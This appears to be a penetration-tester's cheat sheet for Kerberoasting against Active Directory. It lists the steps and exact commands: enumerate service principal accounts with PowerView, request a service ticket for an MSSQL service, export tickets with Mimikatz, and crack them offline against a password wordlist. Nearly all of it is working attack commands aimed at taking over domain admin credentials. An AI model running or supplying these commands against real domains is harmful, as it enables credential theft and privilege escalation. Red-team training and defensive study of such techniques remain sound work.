- First find all the SPN accounts
- Select SPN of a domain admin since we doing privilege escalation
- Set the SPN as the argumentlist value and create a new object ( request a TGS )
- Export the all the tickets by mimikatz
- Keep a note of the file name where the ticket is stored of that service
- Crack the ticket
Get-NetUser -SPN
Get-NetUser -SPN -Verbose | select displayname,memberof
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/computer.domain.local"
klist
Copy the file name of the ticket you exported; In this case its the file path for MSSQLSvc
Invoke-Mimikatz -Command '"kerberos::list /export"'
Request-SPNTicket with PowerView can be used for cracking with JTR
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-user1@MSSQLSvc~computer.domain.localDOMAIN.LOCAL.kirbi